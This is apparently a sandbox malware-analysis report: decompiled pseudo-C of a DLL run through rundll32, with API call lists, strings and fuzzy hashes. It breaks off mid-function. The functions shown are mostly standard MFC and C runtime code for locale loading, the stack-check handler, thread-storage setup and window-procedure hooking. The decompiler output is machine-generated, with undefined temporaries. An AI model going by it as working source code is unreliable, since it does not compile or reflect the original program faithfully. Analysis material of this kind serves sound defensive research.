DrawIcon.USER32 ref: 10008C7E

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
String ID:
API String ID: 1007970657-0
Opcode ID: 34b2481c73848cf5a5b65619b116645cb85ce5e5c475ca315779ed2509392efd
Instruction ID: 92cad86a1f48a06ffd889b7e25b84ff06398f92b7342aaec6ad7b9fd969ef154
Opcode Fuzzy Hash: 34b2481c73848cf5a5b65619b116645cb85ce5e5c475ca315779ed2509392efd
Instruction Fuzzy Hash: BB31F975A00119DFEB24CFA8C995F9EBBB4FF48240F108299E549E7285DE30AA44CF60

Uniqueness

Uniqueness Score: -1.00%

Function 1000A803, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70
libraryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000A803(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __esi;
				void* __ebp;
				signed int _t9;
				intOrPtr* _t18;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t34;
				void* _t35;
				signed int _t36;
				void* _t37;

				_t33 = __edi;
				_t32 = __edx;
				_t28 = __ecx;
				_t26 = __ebx;
				_t9 =  *0x10057a08; // 0xcbf72908
				_v8 = _t9 ^ _t36;
				_t39 = _a4 - 0x800;
				_t35 = __ecx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					_push(E1001808E(__edx,  &_v288, 4, "LOC"));
					E10009BC7(__ebx, _t28, __edi, _t35);
					_t37 = _t37 + 0x10;
					L2:
					_push(_t26);
					_push(_t33);
					_t34 =  *(E10017D62(_t39));
					 *(E10017D62(_t39)) =  *_t14 & 0x00000000;
					_t35 = 0x112;
					_t27 = E10016E0C( &_v284, 0x112, 0x111, 0x112,  &_v288);
					_t18 = E10017D62(_t39);
					_t40 =  *_t18;
					if( *_t18 == 0) {
						 *(E10017D62(__eflags)) = _t34;
					} else {
						E10009DD1( *((intOrPtr*)(E10017D62(_t40))));
					}
					if(_t27 == 0xffffffff || _t27 >= _t35) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
					_pop(_t33);
					_pop(_t26);
				}
				return E100167D5(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
			}

APIs

_strcpy_s.LIBCMT ref: 1000A830

Part of subcall function 10009BC7: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 10009BC7: __EH_prolog3.LIBCMT ref: 1000A0FC

Part of subcall function 10017D62: __getptd_noexit.LIBCMT ref: 10017D62

__snprintf_s.LIBCMT ref: 1000A869

Part of subcall function 10016E0C: __vsnprintf_s_l.LIBCMT ref: 10016E21

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 1000A894
LoadLibraryA.KERNEL32(?), ref: 1000A8B7

Strings

LOC, xrefs: 1000A828

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8H_prolog3InfoLibraryLoadLocaleThrow__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
String ID: LOC
API String ID: 4018564869-519433814
Opcode ID: 85c29d921faf756db8e7e017259237103e49a4f88e38b04ce28b663785a5d064
Instruction ID: ee9450464cbd3e0ce3331b4d2b41357aa0e69ec1529eb2fe66138b72776ed960
Opcode Fuzzy Hash: 85c29d921faf756db8e7e017259237103e49a4f88e38b04ce28b663785a5d064
Instruction Fuzzy Hash: A9119A7190411CABF725D760DC86BDD37B8EF06790F504161F6049B191DF74AEC68BA1

Uniqueness

Uniqueness Score: -1.00%

Function 100167D5, Relevance: 7.6, APIs: 5, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E100167D5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x10057a08; // 0xcbf72908
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x1005afc0 = _t6;
				 *0x1005afbc = _t22;
				 *0x1005afb8 = _t25;
				 *0x1005afb4 = _t21;
				 *0x1005afb0 = _t27;
				 *0x1005afac = _t26;
				 *0x1005afd8 = ss;
				 *0x1005afcc = cs;
				 *0x1005afa8 = ds;
				 *0x1005afa4 = es;
				 *0x1005afa0 = fs;
				 *0x1005af9c = gs;
				asm("pushfd");
				_pop( *0x1005afd0);
				 *0x1005afc4 =  *_t31;
				 *0x1005afc8 = _v0;
				 *0x1005afd4 =  &_a4;
				 *0x1005af10 = 0x10001;
				_t11 =  *0x1005afc8; // 0x0
				 *0x1005aec4 = _t11;
				 *0x1005aeb8 = 0xc0000409;
				 *0x1005aebc = 1;
				_t12 =  *0x10057a08; // 0xcbf72908
				_v812 = _t12;
				_t13 =  *0x10057a0c; // 0x3408d6f7
				_v808 = _t13;
				 *0x1005af08 = IsDebuggerPresent();
				_push(1);
				E100227FB(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x1002b434);
				if( *0x1005af08 == 0) {
					_push(1);
					E100227FB(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

APIs

IsDebuggerPresent.KERNEL32 ref: 1001C445
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001C45A
UnhandledExceptionFilter.KERNEL32(1002B434), ref: 1001C465
GetCurrentProcess.KERNEL32(C0000409), ref: 1001C481
TerminateProcess.KERNEL32(00000000), ref: 1001C488

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 7284fa7d50281a3c049889d49720807c61de6750ecda71a27977002e3826e049
Instruction ID: 29b7c1aed7e77d05a339182a33a9266dca5d513d51f4b37265af4c9016ee4a47
Opcode Fuzzy Hash: 7284fa7d50281a3c049889d49720807c61de6750ecda71a27977002e3826e049
Instruction Fuzzy Hash: 0021B0B4408328DFE701DFA9EDC96487BB0FB0A315F50406AE508873A1E7B459C2CF55

Uniqueness

Uniqueness Score: -1.00%

Function 1000FF59, Relevance: 6.0, APIs: 4, Instructions: 41
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000FF59(void* __ecx) {
				void* __ebx;
				void* __edi;
				signed int _t5;
				void* _t15;
				void* _t18;
				void* _t19;

				_t15 = __ecx;
				if((E10012862(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E1000FAB8(_t15, _t15, _t18, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E1000A7CE();
				if(_t19 == 0) {
					goto L6;
				}
				_t18 = GetKeyState;
				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}

0x1000ff5c
0x1000ff68
0x1000ffb0
0x1000ffb2
0x1000ffb9
0x00000000
0x1000ffbb
0x1000ff6f
0x1000ff73
0x00000000
0x00000000
0x1000ff75
0x1000ff82
0x00000000
0x1000ff96
0x1000ffa5
0x00000000
0x1000ffad

APIs

Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D

GetKeyState.USER32(00000010), ref: 1000FF7D
GetKeyState.USER32(00000011), ref: 1000FF86
GetKeyState.USER32(00000012), ref: 1000FF8F
SendMessageA.USER32 ref: 1000FFA5

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: fb4c216abc4c33cb282e021b119ac4542c3b2f6db45558139360cfc9261ccdec
Instruction ID: de176050283294f5fba88da379e0eecc3ccd74c62a8982f524273e82d2dc9d2d
Opcode Fuzzy Hash: fb4c216abc4c33cb282e021b119ac4542c3b2f6db45558139360cfc9261ccdec
Instruction Fuzzy Hash: 3BF0827B38025B26FA20B2748C41FBA9154CF86BD0F120538FA42EA5DECF91D8022271

Uniqueness

Uniqueness Score: -1.00%

Function 1000AA3A, Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E1000AA3A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x10057a08; // 0xcbf72908
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E10017BC1(E10027E56, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E1000A1E3, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E1001815B( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E100174D0(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E1000A1F9(_t181 - 0x3c, 0x10000000, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E1000A2A9(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E1000A2DF(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E1000A8D0(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E1000A803(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E100167D5(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 1000AA59
GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 1000AA7A
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000AA8B
ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC1
ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC9
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000AADD
ConvertDefaultLocale.KERNEL32(?), ref: 1000AB01
ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000AB07
GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000AB40
GetVersion.KERNEL32 ref: 1000AB55
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 1000AB7A
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 1000AB9F
_sscanf.LIBCMT ref: 1000ABBF
ConvertDefaultLocale.KERNEL32(?), ref: 1000ABF4
ConvertDefaultLocale.KERNEL32(73B74EE0), ref: 1000ABFA
RegCloseKey.ADVAPI32(?), ref: 1000AC09
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 1000AC19
EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,1000A1E3,?), ref: 1000AC34
ConvertDefaultLocale.KERNEL32(?), ref: 1000AC65
ConvertDefaultLocale.KERNEL32(73B74EE0), ref: 1000AC6B
_memset.LIBCMT ref: 1000AC85

Strings

ntdll.dll, xrefs: 1000AC14
GetUserDefaultUILanguage, xrefs: 1000AA82
kernel32.dll, xrefs: 1000AA6C
Control Panel\Desktop\ResourceLocale, xrefs: 1000AB6D
GetSystemDefaultUILanguage, xrefs: 1000AACB

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 434808117-483790700
Opcode ID: 391a7af3d11bcdbc6c68bf10dbaf9488a7631794da5acccd773ff9b8d76e3d4f
Instruction ID: 772d67b6ef5536ffa942379cc2d037747f9683b4a435f76ff704d577c4812cba
Opcode Fuzzy Hash: 391a7af3d11bcdbc6c68bf10dbaf9488a7631794da5acccd773ff9b8d76e3d4f
Instruction Fuzzy Hash: 638182B0D002699FEB10DFA5DC84AFEBBF9FB49350F500626E554E7280DB749A85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1001C11B, Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109
libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E1001C11B(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x1005aea4 = GetProcAddress(_t37, "FlsAlloc");
					 *0x1005aea8 = GetProcAddress(_t37, "FlsGetValue");
					 *0x1005aeac = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x1005aea4;
					_t40 = TlsSetValue;
					 *0x1005aeb0 = _t7;
					if( *0x1005aea4 == 0) {
						L6:
						 *0x1005aea8 = TlsGetValue;
						 *0x1005aea4 = E1001BDD2;
						 *0x1005aeac = _t40;
						 *0x1005aeb0 = TlsFree;
					} else {
						__eflags =  *0x1005aea8;
						if( *0x1005aea8 == 0) {
							goto L6;
						} else {
							__eflags =  *0x1005aeac;
							if( *0x1005aeac == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10057d30 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x1005aea8);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E10018042();
							 *0x1005aea4 = E1001BD03( *0x1005aea4);
							 *0x1005aea8 = E1001BD03( *0x1005aea8);
							 *0x1005aeac = E1001BD03( *0x1005aeac);
							 *0x1005aeb0 = E1001BD03( *0x1005aeb0);
							_t18 = E1001A3D3();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E1001BE05();
								goto L15;
							} else {
								_push(E1001BF91);
								_t21 =  *((intOrPtr*)(E1001BD6F( *0x1005aea4)))();
								__eflags = _t21 - 0xffffffff;
								 *0x10057d2c = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E1001E76E(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x10057d2c);
										__eflags =  *((intOrPtr*)(E1001BD6F( *0x1005aeac)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E1001BE42(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E1001BE05();
					return 0;
				}
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10017978,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C121
__mtterm.LIBCMT ref: 1001C12D

Part of subcall function 1001BE05: __decode_pointer.LIBCMT ref: 1001BE16
Part of subcall function 1001BE05: TlsFree.KERNEL32(0000001F,10017A14,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001BE30

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1001C143
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1001C150
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 1001C15D
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1001C16A
TlsAlloc.KERNEL32(?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C1BA
TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C1D5
__init_pointers.LIBCMT ref: 1001C1DF
__encode_pointer.LIBCMT ref: 1001C1EA
__encode_pointer.LIBCMT ref: 1001C1FA
__encode_pointer.LIBCMT ref: 1001C20A
__encode_pointer.LIBCMT ref: 1001C21A
__decode_pointer.LIBCMT ref: 1001C23B
__calloc_crt.LIBCMT ref: 1001C254
__decode_pointer.LIBCMT ref: 1001C26E
__initptd.LIBCMT ref: 1001C27D
GetCurrentThreadId.KERNEL32 ref: 1001C284

Strings

FlsSetValue, xrefs: 1001C152
FlsFree, xrefs: 1001C15F
FlsGetValue, xrefs: 1001C145
FlsAlloc, xrefs: 1001C13D
KERNEL32.DLL, xrefs: 1001C11C

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 2657569430-3819984048
Opcode ID: f8eb42d05a0f46123fcd151e30e2a53c2e7fcd681058195d0d7fb9ca21756e1b
Instruction ID: b5f7097eefea174a9ed91942db92a94305995674aef8197461d434292f48097b
Opcode Fuzzy Hash: f8eb42d05a0f46123fcd151e30e2a53c2e7fcd681058195d0d7fb9ca21756e1b
Instruction Fuzzy Hash: E4319335900735AFEB11EFB59CCEA4A3BF1EB46360B144526F5049A1B1EBB5D8C0CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10011389, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10011389(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t106;
				long* _t108;
				long _t110;
				signed int _t111;
				CHAR* _t112;
				intOrPtr _t113;
				void* _t116;
				void* _t119;
				intOrPtr _t120;

				_t119 = __eflags;
				_t105 = __edi;
				_push(0x148);
				E10017C2A(E1002866E, __ebx, __edi, __esi);
				_t110 =  *(_t116 + 0x10);
				_t94 =  *(_t116 + 0xc);
				_push(0x1000a0f5);
				 *(_t116 - 0x120) = _t110;
				_t54 = E10013D98(_t94, 0x10058f44, __edi, _t110, _t119);
				_t120 = _t54;
				_t97 = 0 | _t120 == 0x00000000;
				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
				_t121 = _t120 == 0;
				if(_t120 == 0) {
					_t54 = E1000A0DB(_t94, _t97, __edi, _t110, _t121);
				}
				if( *(_t116 + 8) == 3) {
					_t106 =  *_t110;
					_t111 =  *(_t54 + 0x14);
					_t55 = E1000D5EC(_t94, _t106, _t111, __eflags);
					__eflags = _t111;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t116 - 0x124) = _t56;
					if(_t111 != 0) {
						L7:
						__eflags =  *0x1005acbc;
						if( *0x1005acbc == 0) {
							L12:
							__eflags = _t111;
							if(__eflags == 0) {
								__eflags =  *0x1005a8dc;
								if( *0x1005a8dc != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x1005a8dc; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t116 - 0x14) = _t59;
										if(_t59 != 0) {
											_t112 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t112);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t112,  *(_t116 - 0x14));
												_t66 = GetPropA(_t94, _t112);
												__eflags = _t66 -  *(_t116 - 0x14);
												if(_t66 ==  *(_t116 - 0x14)) {
													GlobalAddAtomA(_t112);
													SetWindowLongA(_t94, 0xfffffffc, E10011245);
												}
											}
										}
										L27:
										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
										__eflags =  *(_t116 - 0x124);
										_t110 = _t60;
										if( *(_t116 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t105 + 0x28));
											_t50 = _t105 + 0x28;
											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t113 = 0x30;
								E100174D0(_t106, _t116 - 0x154, 0, _t113);
								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
								_push(_t116 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E1000E5E2(_t94, _t97, _t106, "#32768", __eflags);
								__eflags = _t72;
